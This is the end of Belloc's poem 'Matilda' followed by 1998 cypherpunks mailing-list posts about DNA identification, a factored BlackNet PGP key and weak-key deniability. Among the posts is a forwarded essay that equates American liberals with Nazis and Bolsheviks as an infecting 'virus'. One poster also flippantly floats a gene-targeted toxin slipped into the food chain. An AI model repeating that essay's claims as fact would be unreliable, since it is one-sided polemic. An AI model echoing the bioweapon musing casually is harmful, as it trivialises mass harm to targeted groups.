And would have done so, had not She
Discovered this Infirmity.
For once , towards the Close of Day,
Matilda, growing tired of play
And finding she was left alone,
Went tiptoe to the Telephone,
And summoned the Immediate Aid
Of London's Noble Fire-Brigade.
Within an hour the Gallant Band
Were pouring in on every hand,
>From Putney,Hackney Downs, and Bow
With Courage high and Hearts a-glow
They galloped, roaring through the Town,
`Matilda's House is Burning Down!'
Inspired by British Cheers and Loud
Proceeding from the Frenzied Crowd,
They ran their ladders through a score
Of windows on the Ball Room Floor;
And took Peculiar Pains to Souse
The Pictures up and down the House,
Until Matilda's Aunt succeeded
In showing them they were not needed;
And even then she had to pay
To get the Men to go away!

It happened that a few Weeks later
Her Aunt was off to the Theatre
To see that Interesting Play
The Second Mrs Tanqueray.
She had refused to take her Niece
To hear this Entertaining Piece:
A Deprivation Just and Wise
To Punish her for Telling Lies.
That Night a Fire did break out -
You should have heard Matilda Shout!
You should have heard her Scream and Bawl,
And throw the window up and call
To People passing in the Street -
(The rapidly increasing Heat
Encouraging her to obtain
Their confidence) - but all in vain!
For every time She shouted `Fire!'
They only answered `Little Liar'!
And therefore when her Aunt returned,
Matilda, and the House, were Burned.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Wed, 14 Oct 1998 22:39:43 +0800
Subject: RE: DNA
In-Reply-To: <8025669D.002F7404.00@seunt002e.ssa.co.uk>
Message-ID: <000401bdf77a$fe720d00$932580d0@xasper8d>
MIME-Version: 1.0
Content-Type: text/plain



DNA of identical siblings is identical?  I guess that makes sense, since
we're really split after conception...  so explain why my brother has smooth
hands and fingers with almost no prints (lucky bastard!) and mine look like
mother teresa's face... (probably more now than before, eh?)

X

~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of
~> Richard.Bragg@ssa.co.uk
~> Sent: Wednesday, October 14, 1998 2:44 AM
~> To: mmotyka@lsil.com
~> Cc: cypherpunks@toad.com
~> Subject: RE: DNA
~>
~>
~> DNA testing can never prove anything.  It can rule out someone completely
~> and statistically make it
~> very unlikely to be anyone else.  But what about identical
~> sib's.  They all
~> have exactly the same DNA!
~>
~> There are cases of such children where one becomes a pillar of
~> society and
~> the other less so.
~>
~> A DNA database would allow loads of stuff to be done.  How about
~> a designed
~> disease or toxin that
~> only affects certain gene carriers.  This could be added to the
~> food chain
~> at any time you wanted
~> to incapacitate a particular person or group of people without
~> comprimising
~> any one else.
~>
~> Fun hmmm!!!
~>
~>
~>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 14 Oct 1998 23:52:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
Message-ID: <3624BFD1.7BB0BF77@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back writes:
> Type Bits/KeyID    Date       User ID
> pub   384/5A5AD16B 1994/02/11 *** KEY REVOKED ***
>                               BlackNet<nowhere@cyberspace.nil>
>
> A revoked key, and a rather small key size, this rings a bell, some of
> you may recall that some time ago Paul Leyland factored that key.

For the record, that key was factored by a team consisting of Paul Leyland,
Arjen Lenstra, Alec Muffett, and Jim Gillogly.

-- 
	Jim Gillogly
	23 Winterfilth S.R. 1998, 15:10
	12.19.5.10.16, 7 Cib 9 Yax, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@pobox.com>
Date: Thu, 15 Oct 1998 09:15:48 +0800
To: Adam Back <cypherpunks@cyberpass.net
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <v03130307b249d4908a73@[209.66.100.146]>
Message-ID: <v03102816b24a724036ee@[17.219.105.162]>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> notes that the "Toto death thread"
posting was signed using the "son of Gomer" Blacknet key that
was broken by Paul Leyland (read through the past few days of the
archives to get the context).

Adam notes: "Implications?  Others had CJs keys?  Toto is someone
other than CJ?"

One other implication to consider: you might be able to attain
semi-deniability by siging a message with a key that is breakable
by an adversity with govermental resources (to use an euphamism)
but not by an ordinary, presumably less motivated, cracker.

I.e., when "they" arrest you for "speaking truth to kings," your
lawyer claims that, because the signing key was weak, the
government had forged the message and key in order to attack
you for your otherwise legal political views.

Of course, I'm probably just being paranoid.

Martin Minow
minow@pobox.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 14 Oct 1998 22:54:29 +0800
To: cypherpunks@cyberpass.net
Subject: IP: THE BATTLE FOR AMERICA'S SOUL
Message-ID: <v04020a26b24a5959fb7a@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Wed, 14 Oct 1998 00:27:56 -0400 (EDT)
From: <hsilver@pyx.net>
To: ignition-point@majordomo.pobox.com
Subject: IP: THE BATTLE FOR AMERICA'S SOUL
MIME-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: <hsilver@pyx.net>


*****NOTE******
The following article is intended for those who have attention
spans and the abilitiy to focus and reason beyond 30 second
sound-bites. If you are only capable of reading 30 lines of text
of disjointed sloganisms and cliches, I would recommend you simply
hit the delete key now and thanks for your time. For those who choose
to actually fully read and think about the article below, I believe
you'll find the arguments are well developed, forceful, compelling
and exquisitly reasoned. I found the arguments presented in the
article below as relevent and thought provoking as Fredric Bastiat's
The Law, which is available at; http://www.jim.com/jamesd/bastiat.htm
Bastiat's The Law was penned almost one hundred and fifty years before
the article below.- Harley
**************

Source:  http://www.founding.org/tbfasshortversion.html

                         THE BATTLE FOR AMERICAS SOUL

                               By Balint Vazsonyi

   For thirty years now, the Liberal-Conservative debate has been raging
   in our country. Some of the participants bring to mind a passage from
   Dostoyevskys Crime and Punishment. Raskolnikov, while delirious in the
   Siberian prison hospital, has a recurring dream. In it, the whole
   world had been condemned to a terrible and strange plague. Some new
   sorts of microbes began to afflict people. "Men attacked by them," he
   writes, "became at once mad and furious. But never had men considered
   themselves so intellectual and so completely in possession of the
   truth as these sufferers, never had they considered their decisions,
   their scientific conclusions, their moral convictions so
   infallible..."

   One hundred-and-thirty years after those lines were written, it is
   disquieting to see just such "sufferers" among us today. Are we
   participants in a debate or are we fighting a virus? The following is
   an attempt to find some answers to sort out the sides, their origins,
   their purpose.

                            THE QUESTION THAT MATTERS

   Scholars on both sides suggest that, during the 1960s, the original
   principles on which America was founded came to be interpreted in
   entirely new ways. It was this new understanding, so the suggestion
   goes, which led to fundamental changes in our thinking, our language,
   our institutions. Among other things, this altered reading also
   accounts for the radical shift in the meaning of the term, "Liberal."

   Is the national debate indeed a dialogue between two competing
   interpretations of what we shall call the American Construct? That,
   without a doubt, is the question that matters. If it is, then the word
   "debate" is entirely appropriate. If it is, then neither side can lay
   claim to the 'Truth.' If it is, then the more power to the winners may
   they alternate frequently, as behooves a democracy.

   Before we can decide, we need to remind ourselves of our spiritual and
   philosophical roots. We use the term American Construct here to
   represent the compendium of ideas and principles which issued from
   Franklins Poor Richard, Jeffersons Declaration of Independence, the
   U.S. Constitution, The Federalist Papers of Hamilton and Madison, all
   the way to the Bill of Rights. In order to qualify as indigenous,
   ideas and practices ought to be traceable to, or at least compatible
   with, the American Construct. The following key areas suggest some
   early answers.

     * The Constitution does not provide for Group Rights. Yet, a
       steadily growing number of groups is being granted an increasing
       number of rights.
     * Defense, for which the Constitution does provide, has been
       surrounded by an atmosphere of derision and hostility; the
       effectiveness of our armed forces is being diminished through
       inappropriate use.
     * Of the three branches of government, Congress is entrusted with
       the powers to legislate. Neither the Executive nor the Judiciary
       should presume such powers, yet both have done so with increasing
       frequency.
     * The constitutional guarantee for the freedom of speech becomes
       moot if the vocabulary is controlled by codes, regulations and
       punitive practices.
     * The protection of private property is no longer guaranteed if the
       Executive Branch can confiscate it under the pretext of arbitrary
       regulation.
     * Education used to be based on the best available information, the
       consensus of generations, and rewards designed to extract the best
       effort from all participants. Currently, information is being
       replaced by propaganda, consensus by the whim and din of activist
       groups, best effort by primitive egalitarianism.
     * Americans were supposed to be judged based on what they could do.
       Their prospects are now contingent on what (not even who) they
       are.
     * Morality and decency in human relations which once governed our
       society are being displaced by doctrines which do not, even,
       recognize the existence of values; the spirit of voluntarism is
       being choked by coercion.

   Accordingly, the argument that we are conducting a discourse within
   the American Construct cannot be sustained. That being the case, the
   alternative must be considered. If the debate has not been generated
   from within, it must be one between our own preexisting principles and
   ideas which are foreign in origin. Foreign ideas may be benign or
   hostile. Given the foregoing, as well as the ferocity of the assault
   over the past three decades, there is every reason to assume that they
   are the latter. If so, the very existence of our country, as we know
   it, is at stake. It is therefore of the utmost urgency to seek
   detailed answers to the question that matters.

   To begin with, new ideas are exceedingly rare. We may safely assume
   that most ideas, however differently they might be packaged, have been
   around for some time. The doctrines currently waging their battle
   inside America are likely to be old acquaintances, not brainstorms of
   the 1960s. There is some advantage to be derived: exploring the
   history and curriculum of old ideas provides clues about the path they
   are likely to follow again and again. As we encounter the alarming
   similarities between the so-called Liberal agenda and the practices of
   past regimes, there may be emotional barriers to overcome. How could
   decent, ordinary Americans take their cue from precedents they reject
   and abhor on a conscious level? Yet the facts speak for themselves.

                               BOLSHEVISM FASCISM

   The conventional view, notwithstanding the Hitler-Stalin pact of 1939,
   is that Communism and Nazism were opposites one on the extreme left,
   the other on the extreme right. At the time of the Spanish Civil War
   of 1936, Americans fell victim to the propaganda that Communists and
   Fascists ("Nazi" and "Fascist" will be discussed below) were enemies.
   In addition, the countless distinguished personalities who joined the
   North American Committee to Aid Spanish Democracy created the illusion
   that Communists were 'on the side of righteousness.' Unbeknownst to
   them, the Communist Party ran the entire organization.

   Rather than enemies, Nazism and Communism were the ultimate
   competitors. Each wanted to conquer and rule both over the physical
   world, and over the minds of people. The methods which were developed
   and implemented for the control of behavior took many forms, not all
   of them obvious or even unpleasant when dispensed in small doses. Yet
   they strike at the heart of human relations; they also severe the link
   between cause and effect, so essential in developing an individual's
   viability.

   First, we need to remind ourselves of key words which, in common
   usage, have taken on different connotations: Fascism, Nazism,
   Communism. Webster defines Fascism and Nazism in almost identical
   terms: "a centralized autocratic severely national regime;"
   "regimentation of industry, commerce and finance;" "rigid censorship,
   forcible suppression of opposition." The definition of Communism
   begins with "common ownership of assets." The subheading Bolshevism,
   however, resembles the wording applied to Fascism and Nazism. Webster
   comes remarkably close, but no fully-satisfactory definitions exist.
   In truth, they are simply so many variants of Socialism, and Marx
   himself was already at pains while writing the Communist Manifesto in
   1848 to sort out the different kinds of Socialism.

   Initially, there appears to be a distinction between "National
   Socialism" (the German and Italian varieties) and "International
   Socialism" (the Russian Model), based on the difference in agendas as
   stated by the parties themselves. Reality, however, gives rhetoric the
   lie. Albeit without the Nuremberg Laws or prescribed physical
   characteristics, "The Soviet Man" was made the object of enforced
   worship just the same as was the Aryan hero - nothing international
   about that. Not even in the approach to the fundamental Marxian issue
   of ownership can we observe a substantial difference: The Program of
   the National Socialist German Workers' Party (the full name of the
   Nazi party) demands "the nationalization of all business enterprises
   that have been organized into corporations." A realistic examination
   of these seemingly opposite systems reveals them as mirror images,
   aspiring to a similar objective, applying identical methods, achieving
   comparable subjugation of people under their control, and pursuing the
   same enemies.

   Objective. The agenda underlying all operations calls for unlimited
   discretionary powers to be concentrated in the hands of a small,
   self-perpetuating group in which membership is by invitation only.
   Members of the group typically fall into two categories. One of these
   claims to know what is best for all people; the other simply wants
   unchecked power. The synergy is perfect: Ideologues need terrorists to
   retain physical control; terrorists need ideologues to supply
   intermittent explanations for the rule they maintain. It is only
   natural that the objectives include an effort to expand the number of
   those over whom power is exerted.

   Given the ultimate objective of concentrating all power in the hands
   of a single group, competing formations calling themselves "Fascist,"
   "Nazi," "Communist," "Bolshevik," or "Maoist" must fight it out until
   only one of them remains operative, hence the insistence on being
   'different.'

   Methods. (The reader is asked to compare these to present-day
   practices.) As well as control of the military and the police,
   successful exercise of power requires control of key institutions to
   replace or supplement brute force. The checklist includes news sources
   especially of the visual variety education, the judiciary, labor
   organizations, arts and entertainment, as well as a parental
   relationship between government and the governed. Required, also, is
   the attribution of infallibility at the top. A human replaces the
   object of religious worship, just as holiday celebrations of a
   political nature replace religious ones. Replacement of another kind
   is the renaming of streets, towns, institutions. The purpose is to do
   away with reminders of the past thus discontinuing history and to
   provide constant reminders of the present.

   The practice of discontinuing history is indispensable. Successive
   generations must be devoid of traditions and prevented from comparing
   past and present. It also 'justifies' revision of the entire academic
   curriculum, so that no subject would accidentally provide accurate
   information about history. While adults need the threat of punishment
   in order to 'forget' what they had learned, information can simply be
   withheld from young people and/or manipulated before it reaches them.

   Youth organizations were created with compulsory membership - except
   when exclusion was chosen as an instrument of humiliation. Hitler
   Youth, Komsomol, Pioneers put people in uniform at a young age,
   ensured their early allegiance to The Leader, and placed them under
   the command of a political appointee whose prerogative superseded that
   of both the parental home and the school. Finally, learned faculties
   were placed under the control of political operatives with little or
   no education.

   The corruption of education was matched by the corruption of the legal
   system. This required judges who would subordinate both their natural
   and learned sense of justice to what was declared to be "the higher
   interest of the community." For an example we quote marching orders
   issued by Hans Frank, President of the Academy of German Law and of
   the National Bar Association in the Third Reich:

   "The basis for interpreting all legal sources is the National
   Socialist Philosophy, especially as expressed in the party program..."

   Thus was born the concept of the political activist judge who wore the
   robe as no less a uniform than the black shirt or the red shirt.

   Controlling the behavior of the adult population required the most
   sophisticated approach, if outright terror was to be relaxed to any
   extent. Although Lenin and Stalin pointed the way and Mao Tse-Tung
   achieved the ultimate by making one billion people wear the same
   clothes, it was the Germans ever the theorists who supplied the
   terminology for the first tool. They called it "Gleichschaltung,"
   which verbatim means "switching to being the same." The program called
   for total alignment with the goals of Nazi policies and placed
   everyone on the same level, creating the ultimate degree of
   conformity.

   Gleichschaltung operated at once on structural and cultural levels.
   Structurally, the first victim was federalism: Within days of Hitler's
   accession, the states had to cede authority to the central government.
   Next, the leadership and membership of every kind of organization had
   to become politically and racially correct. While a variety of
   agencies had the task of implementing the structural changes, as early
   as March 1933 a separate Cabinet Department was created for Josef
   Goebbels to oversee every aspect of the cultural scene, making certain
   that it was politically correct. Specific terms aside, the reality of
   all these regimes is the great flattening of society which is in full
   progress from day one. It is astonishing and frightening how little
   time it took both in Russia and in Germany to accomplish this task.
   Indeed, it should be noted that demolishing what centuries had built
   does not require even a single generation.

   The other tool had to do with groups. While it may appear
   contradictory to identify groups in a society having just experienced
   Gleichschaltung, contradictions do not represent obstacles in a
   totalitarian structure. Placing the emphasis on groups was as
   necessary as the leveling had been: It facilitated positive and
   negative imaging. This constant dichotomy of egalitarianism and group
   hatred provided a manipulative tool as simple as it was ingenious.
   Hitler used race and nationality, Lenin and Stalin mostly class the
   outcome was the same.

   Subjugation. (Please continue the comparison with current tendencies.)
   It is commonly known that the Gestapo was a state within the State, as
   was the Cheka/GPU/NKVD/KGB establishment. Their responsibility was not
   merely control but the maintenance of a permanent state of fear. Yet
   internal security organs, however large, could not by themselves see
   to that. Therefore, in one sense or another everyone was recruited to
   be an agent of fear. In Nazi Germany, as in Soviet Russia, children
   were encouraged to inform on their parents, neighbors on each other.
   Very soon it became a matter of reporting someone before someone
   reported you. It was possible to be reported for virtually anything,
   so that people grew fearful of doing or saying everyday, ordinary
   things. One could never be safe from somebody 'putting a spin' on the
   most innocent act or remark.

   Enemies. Whereas democracies associate enemies with physical attack or
   the threat thereof, both Nazism and Communism required at all times
   the existence of enemies, internal and external. The array of internal
   enemies would suggest a certain difference: Jews for the Nazis, "Class
   Enemies" for the Bolsheviks. However, the Russians had anti-Jewish
   pogroms long before Hitler and, later, significant numbers of Jews
   were exiled or killed as "exploiters." The aristocracy was looked upon
   just as much an enemy by the Nazis who were, after all, Socialists.
   The Church was regarded as an enemy by both, partly because it
   advocated morality, and because it, too, required allegiance and
   obedience and attitude reserved exclusively for The Party. "National
   Socialist and Christian concepts are irreconcilable," so Martin
   Bormann begins the Third Reich's definitive statement on the subject.
   Yet, it is in the realm of Nazism's and Bolshevism's external enemies
   that examination proves the most revealing. Experience confirms that
   the primary enemy in the eyes of Nazis and Communists alike was the
   English-speaking world, in all its manifestations.

   In my native Hungary, where Soviet occupation followed Nazi
   occupation, typically the same henchmen jailed the same persons for
   the same offense: Listening to an English-language broadcast whether
   in 1944 or in 1952. The reasons are obvious. To all those who would
   take over the world, Great Britain and the United States have been the
   main impediment. Philip II of Spain and Napoleon had known that
   already; Hitler and Stalin had to learn it anew. Neither German
   technological genius nor Soviet numerical advantage was sufficient to
   carry the day against Anglo-American resolve, because it was backed by
   principles, attitudes and traditions which had brought forth stable,
   productive, peacefully-evolving societies. And since language is the
   carrier of ideas, English words were perceived to be as menacing as
   Spitfire interceptors or nuclear submarines. The power of seminally
   English phrases like "My home is my castle" or "Innocent until proven
   guilty" is awesome. The strenuous efforts by Liberals to diminish the
   presence of English in contemporary America furnish additional proof.

                        WHAT'S 'RIGHT' WHAT'S 'POSSIBLE'

   The epoch-making contributions of Germans from Luther to Goethe, from
   Bach to Wagner, from Gutenberg to Zeiss reveal a great similarity
   across the centuries, across the various fields of endeavor. From
   Luther's 'nailing his 95 Theses to the door' through Bach's The Art of
   the Fugue and Goethe's Faust to Wagner's Gesamtkunstwerk, the observer
   beholds the German tendency and capacity for seeking and creating the
   absolute, the all-encompassing, the ultimate. When applied to
   philosophy, this same tendency gave birth to Kant who declared his
   chief work free from error. He was followed by Hegel, who more or less
   declared the end of history. By this juncture, German philosophy had
   established its lineage all the way back to Plato, and regarded itself
   sole heir to the search for what is right. From that point onward, a
   seemingly endless succession of German thinkers, in a mostly
   descending sequence of brilliance and/or morality, began to convert
   philosophy into Social Dogma. Social Dogma is based on a simple
   assumption: That certain people know better what is best for all other
   creatures, and that such people possess the right to enforce their
   'enlightened' beliefs because they shall lead the rest of us to a
   'perfect' world.

   Taking his cue, perhaps, from what had begun in 1215 at Runnymede, it
   was John Locke who (nearly five hundred years later) identified and
   settled for attainable goals. He and Adam Smith seem to have broken
   with the two-thousand-year-old search for what is 'right,' and
   substituted an inquiry into that which is possible. It would be
   consistent with the previous argument to suggest that the sober
   modesty of Locke and Smith was as much a reflection on British
   temperament as Kant or Hegel was on the German. Be that as it may, the
   astonishing influence of their thought is comparable only to the
   success of the societies which paid attention to them. Without
   diminishing the significance of Locke's lasting pronouncements on the
   limited role of government, the separation of powers, the relationship
   of the individual to the community, or the full roster of civil
   liberties, one is tempted to say that his genius lay in the very
   acceptance of certain limitations, which is at the heart of his Essay
   Concerning Human Understanding. Free from what Friedrich Hayek calls
   the "fatal conceit," Locke presents his chief work fully cognizant of
   inconsistencies, perhaps to signal that these are forever inherent in
   the human condition.

                              MONOLOGUES DIALOGUES

   It took another hundred years before Nietzsche would declare God
   "dead" but, by claiming to be free from error, Kant began what amounts
   to a monologue. Hegel and Marx continued the practice of dispensing
   monologues. By the time Marx appeared on the scene, German thinkers
   had succeeded in seizing center-stage from the French. Social Dogma
   was now ready to embark on the effort of replacing Christianity as the
   dominant religion, hence its first conquest in Russia where only a new
   orthodoxy was capable of upstaging the old one. Russia had produced no
   thinkers of its own and was in desperate need of alternatives. Yet,
   there may have been deep-seated reasons in Germany itself. After
   centuries of struggle for a consolidated German state, after centuries
   of religious contention between Catholics and Protestants, between
   Lutherans and Calvinists, the perceived need for a set of finite
   doctrines was approaching crisis levels. Social Dogma provided all
   answers, bypassed or eliminated 'troublesome' individual rights, and
   throve on group hostility. Because it does not accommodate contrary
   opinion and rules by decree without room for discussion, it must lead
   to intrusive government the ultimate embodiment of The Monologue.
   Where it ran its full course, it gave the world leaders like Lenin,
   and his two stellar disciples: Stalin and Hitler.

   By contrast, the founding of the United States of America occurred
   amidst a series of dialogues. Most notable among these was the
   long-standing disagreement between Jefferson and Hamilton. They and
   their contemporaries managed to divine from their studies of other
   societies an uncommon understanding of human nature. Postulating moral
   foundations as a given, these men created a framework which sought to
   limit secular laws, rules and regulations to the necessary minimum.
   They recognized that the fewer the rules, the broader the potential
   agreement. Broad agreement, in turn, results in less strife. Less
   strife leaves people free to create and accomplish. The fewer
   obstacles placed in the path of individuals, the less energy wasted in
   trying to overcome them. Nevertheless, they left the doors wide open
   for the continuation of the dialogue, enshrined in the American
   Construct as the system of checks and balances.

                             PRODUCTION DISTRIBUTION

   Adam Smith sets the agenda at the outset of his The Wealth of Nations
   by discussing production and productivity. It is a study of constantly
   accumulating wealth, providing increased access to a growing number of
   participants. On the opposite side, Marx's chief argument concerns
   "surplus value" and to whom it ought to belong. (In fact, he presumes
   to determine to whom anything may belong.) From the outset, Social
   Dogma concentrates on distribution. Socialism is defined as
   distribution of the national product based on individual performance,
   Communism as distribution of the national product based on individual
   need. Social Dogma is unable even to think in terms of production, of
   increased availability. Instead, it is obsessed with the distribution
   of what it considers a finite quantity of goods.

   A review of the past thirty years in the United States will confirm
   these findings. American Liberals have concentrated solely on
   distribution. Emphasis was shifted from opportunity to entitlement.
   Instead of increased productivity, Liberal efforts are always directed
   toward increasing demands. These demands are for unearned
   participation in, and distributions from, the accomplishments of those
   who produce the nation's goods tangible and intangible. Those who
   would resist are branded with pejorative labels no self-respecting
   American is able to bear.

   Agendas of confiscation and of arbitrary distribution result in a
   downward spiral. With incentives shrinking, less and less is produced,
   consequently there is less and less to distribute. This, in a
   nutshell, is why welfare states invariably increase poverty.

                              MINORITIES MAJORITIES

   Were it sensible and desirable in and of itself, 19th century German
   Social Dogma would still be irrelevant for the United States. It was
   devised under conditions and with societies in mind in which a
   minority enjoyed a high standard of living, while the circumstances of
   the "overwhelming majority" (in the words of Marx) were in urgent need
   of improvement. By the time Social Dogma launched its all-out assault
   on the American Construct during the mid-1960s the overwhelming
   majority of Americans had come to enjoy a higher standard of living
   than members of any previous society. How, then, was it possible for
   this patently alien, irrelevant doctrine to pervade our thinking, our
   language, our institutions?

   Social Dogma persuades its intended victims that it has people's best
   interest in mind, that it seeks peace, justice, and equality, that it
   is motivated by caring and compassion. Its ability to camouflage true
   intent and adapt to a specific scenario is matchless. It never admits
   to prohibiting freedom of speech; instead, it masquerades in the Third
   Reich as "allegiance to the Fuhrer," in the Soviet realm as "class
   struggle," in the United States as "politically correct vocabulary."
   It never admits to obstructing the path of the talented; instead, it
   decrees purification of the race (Third Reich), leadership of the
   proletariat (Soviet Union), affirmative action (United States). It
   never admits to confiscating the property of those who had succeeded;
   instead, it claims to recover "what the Jews had plundered" (Third
   Reich), to establish national ownership (Soviet Union), to protect the
   environment (United States).

   A convergence of unusual circumstances rendered Americans receptive,
   among them the ennui of the affluent, the Vietnam debate, the new
   preoccupation with clean water and air, the Civil Rights movement.
   Along with its staples of "peace," "social justice," and all-round
   'goodness,' Social Dogma promised unlimited and unrestricted sex.
   Soon, an entire generation of Americans was convinced that their own
   existing ideals and aspirations blended naturally with Social Dogma,
   which merely expressed them in 'more precise and more global terms.'
   Thus, the interpretation of the Vietnam conflict was switched. No
   longer an effort by the Free World to contain Communist expansion, it
   became "the just struggle of a small people against the mighty
   Imperialists." The rising tide of legitimate concern for America's
   Blacks was harnessed to brand every person of white skin with the
   indelible stigma of racism, thereby eliminating any prospect of a
   resolution. The genuine compassion Americans feel toward the less
   fortunate was corrupted into the agenda of redistribution. Academic
   freedom in our universities was turned into a weapon to stifle
   academic freedom, just as Martin Heidegger Hitler's first appointee as
   University President, and still an object of academic worship in
   America had demanded in 1933. With utter disregard for the American
   experience which had proven the very opposite of Social Dogma at every
   turn, the minds of an entire generation were taken over completely,
   producing several million unwitting Fellow Travelers. Today, it is
   that same generation which performs mind-snatching on successive
   generations of children.

   They are stealing childhood from our children who are commandeered on
   the streets to march against ballot items they cannot possibly
   comprehend. Boys and girls are recruited to act as mouthpieces for
   activists on behalf of issues patently outside their youthful
   interests or grasp. A majority of them now believe they belong to a
   minority. Far from being encouraged to think of themselves as
   Americans, their sense of identity is imprinted with the stigma of
   separateness from their earliest moments of consciousness. The
   camouflage applied in this area bears the labels "self esteem," "role
   models," "roots."

   Most immigrants took their lives in their hands because in the country
   of their birth they could not get ahead, or could not get along (or
   both). What made the difference? Why have men and women Irish,
   Sicilian, Hungarian, Vietnamese and, yes, African made out so
   infinitely better over here than over there?

   The American Construct knew nothing about hyphens. If everybody was
   American, plain and simple, the curse of warring groups will have been
   eliminated and a community of individuals was free to evolve. Nearly
   two centuries later, the assault of Social Dogma was spearheaded by
   the arrival of the hyphen. The hyphen accomplished what the Wolfpack,
   the V1, the V2, and all the ICBMs of the Soviet Union could not. It
   created the seams at which America was to come apart.

   Meanwhile, a growing multitude of minorities is attempting the uneasy
   fit of employing Social Dogma developed to suppress the minority in a
   given society to gain objectives advocated by self-appointed leaders.
   Common sense would inform them that destroying the very structure in
   which they seek accommodation has never been a successful recipe. If
   the objective is to live inside a certain building, demolishing it and
   distributing the bricks is hardly the way to go. Social Dogma has yet
   to succeed in building anything at all. History has recorded its
   unparalleled record of destruction, which is why the so-called
   National Standards for U.S. History and for World History had gone to
   such lengths to eliminate the teaching of history in our schools.

                               DEBATE OR WARFARE?

   And so we return to The Question That Matters. Communism and Nazism
   have demonstrated what might happen if Social Dogma governs. At the
   expense of the individual law, education, and human interaction of
   every kind will be subordinated to some "higher purpose," expressed
   always in terms of group identity. The agenda is prescribed and
   adjusted daily by those who claim to 'know best' what is appropriate
   for all creatures.

   During the 19th century, the clash between these conflicting views
   remained confined to writings. In 1914, the contest moved to the
   battlefield. Two World Wars and the so-called Cold War later the same
   battle continues to rage, now in the everyday life of America. It is,
   without doubt, a fight to the finish. Yet those who have been
   persuaded that we are debating merely different approaches to our
   shared American traditions remain the great majority. Decades of mind
   manipulation by social theorists, social dogmatists, has succeeded in
   distorting our vision.

   That which divided Kant from Locke, Marx from Adam Smith, separates
   Liberals from Conservatives in today's America. Significantly, Locke
   neither implied that he was privy to divine insight nor found himself
   in need of declaring God "dead" to make his point. English-speaking
   thinkers, unlike their German counterparts, did not seek to challenge
   religion an important distinction between the protagonists, still
   today. Securely anchored in their moral foundations, Conservatives can
   afford to pursue the dialogue as a process of discovery, amongst
   themselves and with the American people at large. Liberals must
   continue to rely upon their unrelenting monologue.

   Because in the short term dialogue can appear as uncertainty and
   monologue as strength, the time has come to distinguish between
   appearance and substance as follows:

     * The agenda of so-called Liberals in America rests on 19th century
       (German) Social Dogma. No alternative roots of significance are
       traceable.
     * Social Dogma is diametrically opposed the principles on which this
       nation was founded.
     * Social Dogma seeks to restrict freedom of speech, freedom of
       movement, advancement without discrimination, and the protection
       of private property.
     * Having lost two World Wars and the Cold War, Social Dogma
       continues to cast aspersions on our defense establishment, seeking
       eventually to destroy the capability of this country to resist and
       combat forces of oppression.
     * Social Dogma, unchallenged, has led to Bolshevism and Nazism.

     _________________________________________________________________

   These are the origins, this is the true nature of the so-called
   Liberal agenda. Without comprehending it, we are unlikely to exorcize
   it. Some have argued that even the Liberal agenda has 'good' points,
   but then people were taken in by Hitler's Autobahns, Mussolini's
   success in getting the trains to run on time, or all those Five-Year
   Plans which were supposed really, but REALLY, to put food on Soviet
   tables.

   Remember Raskolnikov's visionary nightmare about the new microbes?
   "Men attacked by them became at once mad and furious. But never had
   men considered themselves so intellectual and so completely in
   possession of the truth as these sufferers, never had they considered
   their decisions, their scientific conclusions, their moral convictions
   so infallible..."

   We have identified the microbes and the plague they spread. We called
   the virus Social Dogma. Cataloguing the damage it has already caused
   to America is but a first step. Next, we must learn to differenciate
   between those who have been infected, and those who are actively
   spreading the virus. While the former may be cured, the latter need to
   be engaged head-on.

     _________________________________________________________________

      (c) Copyright 1996 Balint Vazsonyi





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Wed, 14 Oct 1998 17:11:32 +0800
To: mmotyka@lsil.com
Subject: RE: DNA
Message-ID: <8025669D.002F7404.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



DNA testing can never prove anything.  It can rule out someone completely
and statistically make it
very unlikely to be anyone else.  But what about identical sib's.  They all
have exactly the same DNA!

There are cases of such children where one becomes a pillar of society and
the other less so.

A DNA database would allow loads of stuff to be done.  How about a designed
disease or toxin that
only affects certain gene carriers.  This could be added to the food chain
at any time you wanted
to incapacitate a particular person or group of people without comprimising
any one else.

Fun hmmm!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 14 Oct 1998 23:50:18 +0800
To: users@einstein.ssz.com (SSZ User Mail List)
Subject: 18th Century Hacking [scienceagogo]
Message-ID: <199810141532.KAA11922@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.scienceagogo.com/news/19980914030842data_trunc_sys.shtml

> Subject: 19980914030842data_trunc_sys.shtml

>    Richard Taylor
>    richard@jujumedia.com   Apple UK Old Post Bags: The Story of the
>    Sending of a Letter in Ancient and Modern Times, brought to our
>    attention by the Dead Media Project.
>    
>     In those days, "franking" was the name of the game, meaning the
>    transmission of information by way of sophisticated encryptions on the
>    outside of an envelope. The trick was to take advantage of the
